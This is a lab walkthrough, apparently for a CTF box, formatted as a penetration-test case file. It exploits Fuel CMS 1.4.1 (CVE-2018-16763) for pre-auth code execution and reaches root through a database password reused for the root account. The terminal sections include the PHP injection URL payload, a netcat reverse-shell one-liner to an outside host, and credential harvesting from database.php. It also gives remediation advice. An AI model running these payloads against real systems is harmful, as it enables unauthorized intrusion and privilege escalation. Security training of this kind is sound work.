Fuel CMS 1.4.1 pre-auth RCE and database.php root password reuse
Foundations Linux engagement: Fuel CMS 1.4.1 (CVE-2018-16763) accepted pre-auth PHP evaluation via /fuel/pages/select filter; reverse shell as www-data; root password reused from application/config/database.php.
- Case files
- Fuel CMS 1.4.1 pre-auth RCE and database.php root password reuse
Identified Fuel CMS 1.4 on :80; exploited CVE-2018-16763 for command execution; pivoted from www-data to root via hardcoded DB credentials.
Confirmed Fuel 1.4; ran exploit.py command loop; spawned reverse shell as www-data.
Read DB config; reused password with su root; recovered root artifact.
Engagement summary
Identified Fuel CMS 1.4 on :80; exploited CVE-2018-16763 for command execution; pivoted from www-data to root via hardcoded DB credentials.
IGNITE hosted Fuel CMS 1.4.1 behind HTTP. robots.txt and the landing page advertised /fuel with default admin documentation credentials; version 1.4 was explicit on the welcome surface. searchsploit / Exploit-DB listed CVE-2018-16763 — pre-authentication remote code execution through the pages/select filter parameter (PHP system() via crafted filter). The engagement used the local Fuel CMS 1.4.1 RCE PoC (exploit.py) against http://TARGET to obtain an interactive command channel, then a reverse shell as www-data. User artifact recovered from the web context. Privilege escalation: /var/www/html/fuel/application/config/database.php contained MySQL root credentials (password mememe pattern in lab builds). That password was reused for the OS root account — su root succeeded. Root artifact from /root. Full chain: unpatched CMS RCE → config secret → root password reuse.
Business impact
Internet-facing CMS versions with known pre-auth RCE are automatic compromise. Application config files that embed OS-equivalent passwords turn a web foothold into immediate root. Patch Fuel CMS past 1.4.1, remove default creds from public pages, and never reuse database passwords as root.
CVE-2018-16763 foothold
Confirmed Fuel 1.4; ran exploit.py command loop; spawned reverse shell as www-data.
OPERATOR · RCE
savvy@lab:~$ nmap -sV -sC 10.10.10.10
80/tcp open http Apache — Fuel CMS 1.4
savvy@lab:~$ python3 exploit.py -u http://10.10.10.10
[+]Connecting... Enter Command $ id uid=33(www-data)
Enter Command $ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.0.54 4444 >/tmp/f
reverse shell → www-data
EXPLOIT URL SHAPE
fuel-filter-rce.txt
GET /fuel/pages/select/?filter='+pi(print($a='system'))+$a('<CMD>')+'
CVE-2018-16763 — Fuel CMS <= 1.4.1database.php credential reuse to root
Read DB config; reused password with su root; recovered root artifact.
OPERATOR · PRIVESC
savvy@lab:~$ grep -A5 "['\"]password['\"]" /var/www/html/fuel/application/config/database.php
'username' => 'root', 'password' => 'mememe',
savvy@lab:~$ su root
Password: ********
root@lab:~# cat /root/root.txt
b9bbcb33e11b80be759c4e844862482d
Remediation
Upgrade Fuel CMS; restrict /fuel to admin networks; rotate all secrets after RCE. Store DB credentials in a vault with least privilege (not MySQL root). Distinct passwords for OS root vs application DB. Remove setup banners that publish default admin credentials.